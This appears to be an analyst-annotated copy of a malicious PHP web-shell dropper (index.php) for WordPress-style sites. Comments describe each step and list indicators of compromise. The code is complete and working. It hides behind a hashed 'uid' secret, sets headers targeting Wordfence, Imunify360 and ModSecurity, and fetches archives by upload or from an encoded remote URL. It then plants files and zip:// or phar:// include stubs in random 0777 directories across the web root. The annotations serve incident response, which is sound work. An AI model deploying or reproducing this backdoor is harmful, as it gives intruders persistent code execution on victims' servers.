관리-도구
편집 파일: index.php
<?php
/*
 * ANALYST ANNOTATION. Comments only: every statement below is the original text,
 * with line breaks inserted between statements so each step can be described.
 *
 * What the code does, in order:
 *   1. Turns off PHP error logging/reporting and lifts the execution time limit.
 *   2. Refuses to continue unless a `uid` value (cookie or request parameter)
 *      hashes to the constant stored in $e.
 *   3. Recursively lists every directory below DOCUMENT_ROOT.
 *   4. Obtains an archive: either an uploaded file (form field `pluginzip`) or a
 *      download whose source is carried, hex-encoded and compressed, in `l`.
 *   5. Writes each archive entry into a newly created, randomly named
 *      subdirectory of a randomly chosen directory.
 *   6. Writes one index.php stub per entry that include()s that entry through
 *      the zip:// or phar:// stream wrapper.
 *
 * Artefacts visible in the code that a responder can search for:
 *   - request inputs named uid, l, n, o and the multipart field pluginzip;
 *   - response bodies consisting of the single character "p", "d" or "z", or a
 *     newline-separated list of docroot-relative paths;
 *   - directories with 6-character names drawn from [0-9a-z], requested with
 *     mode 0777;
 *   - a file whose name ends in ".zip" inside such a directory
 *     ("index.php.zip" when `o` is absent or "1");
 *   - small index.php files containing include("zip://  or  include("phar://
 *   - the 32-hex-character constant assigned to $e.
 */

/* Suppress error logging and reporting, remove the time limit, discard any buffered output. */
@ini_set('error_log',NULL);@ini_set('log_errors',0);@ini_set('max_execution_time',0);@error_reporting(0);@set_time_limit(0);@ob_clean();

/* Reset the opcode cache when the extension is present. */
if(function_exists("opcache_reset"))opcache_reset();

/* Response headers asking intermediaries not to buffer or encode the output. */
@header("X-Accel-Buffering: no");@header("Content-Encoding: none");

/* Runs only if a function with this name exists; then sends an X-LSCACHE: off response header
   when the request carried X-LSCACHE. */
if(function_exists('litespeed_request_headers')){$c=litespeed_request_headers();if(isset($c['X-LSCACHE']))header('X-LSCACHE: off');}

/* Expected digest of the access secret; compared against the nested hash of `uid` below. */
$e='ff3a816e23d69979ae6f8cae49aef3ea';

/* Defines two WORDFENCE_DISABLE_* constants when WORDFENCE_VERSION is defined.
   NOTE(review): whether Wordfence honours constants with these names is not shown here. */
if(defined('WORDFENCE_VERSION')){define('WORDFENCE_DISABLE_LIVE_TRAFFIC',true);define('WORDFENCE_DISABLE_FILE_MODS',true);}

/* Guarded by both a function_exists() and a defined() check; copies or sets X-Imunify360-*
   values as RESPONSE headers.
   NOTE(review): nothing on this page shows that the product reads response headers. */
if(function_exists('imunify360_request_headers')&&defined('IMUNIFY360_VERSION')){$g=imunify360_request_headers();if(isset($g['X-Imunify360-Request']))header('X-Imunify360-Request: bypass');if(isset($g['X-Imunify360-Captcha-Bypass']))header('X-Imunify360-Captcha-Bypass: '.$g['X-Imunify360-Captcha-Bypass']);}

/* Reflects an incoming X-Mod-Security request header back as a response header.
   $h is only assigned when apache_request_headers() exists. */
if(function_exists('apache_request_headers')){$h=apache_request_headers();if(isset($h['X-Mod-Security']))header('X-Mod-Security: '.$h['X-Mod-Security']);}

/* When CLOUDFLARE_VERSION is defined, overwrites REMOTE_ADDR with the CF-Connecting-IP request
   header and reflects $h['HTTP_CF_VISITOR'] if that key is set. */
if(isset($_SERVER['HTTP_CF_CONNECTING_IP'])&&defined('CLOUDFLARE_VERSION')){$_SERVER['REMOTE_ADDR']=$_SERVER['HTTP_CF_CONNECTING_IP'];if(isset($h['HTTP_CF_VISITOR']))header('HTTP_CF_VISITOR: '.$h['HTTP_CF_VISITOR']);}

/* Local wp_die(): prints its argument and terminates.
   NOTE(review): PHP does not allow a function to be declared twice, so this declaration
   presumably means the file is requested directly rather than loaded inside WordPress; in that
   case the defined() checks above would not match. Confirm against how the file was reached. */
function wp_die($j){die($j);}

/* Access gate: take `uid` from the cookie if present, otherwise from the request. */
$k=!empty($_COOKIE['uid'])?$_COOKIE['uid']:$_REQUEST['uid'];
/* Nested md5/sha1 of the value must equal $e; otherwise the response body is "p" and the script ends. */
if(empty($k)||md5(md5(sha1(md5(md5($k)))))!=$e)wp_die("p");

/* listFolders($m): recursive scandir(); returns the paths of all directories below $m. */
function listFolders($m){$q=scandir($m);$r=array();foreach($q as $u){if($u=="."||$u=="..")continue;$v=$m."/".$u;if(is_dir($v)){$r[]=$v;$r=array_merge($r,listFolders($v));};}return $r;}

/* rstr($w): $w characters (default 6) cut from a shuffled copy of [0-9a-z]. */
function rstr($w=6){return substr(str_shuffle('0123456789abcdefghijklmnopqrstuvwxyz'),1,$w);}

/* to($v,$x): choose a random entry of the directory list $v, create a subdirectory with a
   random 6-character name (mode 0777, recursive) and return a path inside it.
   The file name depends on request parameter `o` (default "1"):
     "1" -> index.php, "2" -> random 5-character name plus .php, "3" -> $x as given;
   any other value leaves the path ending at the new directory. */
function to($v,$x){$y=rand(0,count($v)-1);$z="1";if(!empty($_REQUEST['o']))$z=$_REQUEST['o'];$aa=$v[$y]."/".rstr()."/";mkdir($aa,0777,true);if($z=="1"){$aa.="index.php";}elseif($z=="2"){$aa.=rstr(5).".php";}elseif($z=="3"){$aa.=$x;}return $aa;}

/* d1($bb): read $bb line by line via fopen()/fgets(); returns false if it cannot be opened. */
function d1($bb){$cc=@fopen($bb,'r');$dd="";if(!$cc)return 
false;stream_get_meta_data($cc);while(!feof($cc)){$dd.=fgets($cc);}fclose($cc);return $dd;}

/* d2($bb): returns the result of file_get_contents($bb). d1() is called when that result is
   empty, but its return value is not used. */
function d2($bb){$ee=file_get_contents($bb);if(empty($ee))d1($bb);return $ee;}

/* fw($bb,$v,$gg): write $v to $bb with file_put_contents(); on failure retry with fopen()/fwrite(),
   or copy from stream $gg when one is passed. Returns true on success, false otherwise.
   The mixed-case FOPen/fClOsE are ordinary fopen/fclose calls (PHP function names are
   case-insensitive); presumably spelled this way to defeat case-sensitive string matching, so
   content scanners should match case-insensitively. */
function fw($bb,$v,$gg=null){if(file_put_contents($bb,$v)){return true;}else{$hh=@FOPen($bb,"w");if($hh){if(fwrite($hh,$v)||($gg!=null&&stream_copy_to_stream($gg,$hh))){@fClOsE($hh);return true;};}};return false;}

/* down($w,$ii): fetch $w into local file $ii. Uses cURL (CURLOPT_FILE, 50 s timeout) when
   available, otherwise d2() followed by fw(). Returns true on success. */
function down($w,$ii){$jj=false;if(function_exists('curl_init')){$kk=curl_init($w);$cc=fopen($ii,'w+');curl_setopt($kk,CURLOPT_FILE,$cc);curl_setopt($kk,CURLOPT_TIMEOUT,50);if(curl_exec($kk)){$jj=true;}curl_close($kk);fclose($cc);}else{$dd=d2($w);if($dd)$jj=fw($ii,$dd);}return $jj;}

/* l=a: respond with the MD5 of this file itself and stop (presumably a presence/version probe). */
if(!empty($_REQUEST["l"])&&$_REQUEST["l"]=="a")wp_die(md5_file(__FILE__));

/* Enumerate all directories under the document root and pick a staging path for the archive.
   This call to to() already creates one random directory. */
$ll=$_SERVER['DOCUMENT_ROOT'];$mm=listFolders($ll);$gg=to($mm,"").".zip";

/* Archive source, first match wins:
     - multipart upload in field `pluginzip`: $gg becomes the upload's temporary path
       (move_uploaded_file() is called with the same source and destination);
     - `l`: hex-decoded and zlib-uncompressed, then passed to down() as the source; a failed
       download answers "d";
     - only `uid` in the request: an HTML upload form is printed and the script ends. */
if(!empty($_FILES['pluginzip'])){$gg=$_FILES['pluginzip']['tmp_name'];move_uploaded_file($_FILES['pluginzip']['tmp_name'],$gg);}elseif(!empty($_REQUEST["l"])){if(!down(gzuncompress(hex2bin($_REQUEST["l"])),$gg))wp_die("d");}elseif(!empty($_REQUEST['uid']))wp_die("<form method='post' enctype='multipart/form-data'><input type='file' name='pluginzip'><input type='submit'/>");

/* $nn: stream-wrapper prefix used by the stubs written at the end; $oo: archive entry names. */
$nn="";$oo=array();

/* Extraction.
   With ZipArchive: open $gg (answer "z" on failure), and for every entry read its contents,
   write them to a path from to() using the entry's base name, and print the docroot-relative
   path. Afterwards $nn is set to a zip:// prefix pointing at $gg.
   Without ZipArchive but with `n`: entry names come from `n` (hex + zlib, "|"-separated) and
   are read through phar://; $nn is set to a phar:// prefix. */
if(class_exists("ZipArchive")){$pp=new ZipArchive();if($pp->open($gg)!==TRUE)wp_die("z");for($y=0;$y<$pp->numFiles;$y++){$qq=$pp->getNameIndex($y);$cc=$pp->getStream($qq);$oo[]=$qq;$rr=explode("/",$qq);$ss=end($rr);if($cc){$tt=stream_get_contents($cc);$uu=to($mm,$ss);$vv=str_replace($ll,"",$uu)."\n";if(fw($uu,$tt,$cc)){echo $vv;};}}$pp->close();$nn='"zip://'.$gg.'#';}elseif(!empty($_REQUEST["n"])){$nn='"phar://'.$gg.'/';$oo=explode("|",gzuncompress(hex2bin($_REQUEST["n"])));foreach($oo as $ww){$tt=file_get_contents('phar://'.$gg.'/'.$ww);if($tt){$uu=to($mm,$ww);$vv=str_replace($ll,"",$uu)."\n";if(fw($uu,$tt)){echo $vv;};}}}

/* Stub generation: `o` is forced to 1 so every stub is named index.php. For each entry name a
   new random directory receives a short PHP file that sets $h to the entry name (only when
   HTTP_HOST is non-empty) and include()s it from the staged archive via the $nn prefix.
   The string literal below spans two lines in the original and is left exactly as found. */
if(!empty($nn)){$_REQUEST['o']=1;foreach($oo as $ww){$uu=to($mm,'');$tt='<?=@null; $h="";if(!empty($_SERVER["HTTP_HOST"])) $h = "'.$ww.'"; 
include('.$nn.'$h");?>';if(fw($uu,$tt))echo str_replace($ll,"",$uu)."\n";}}?>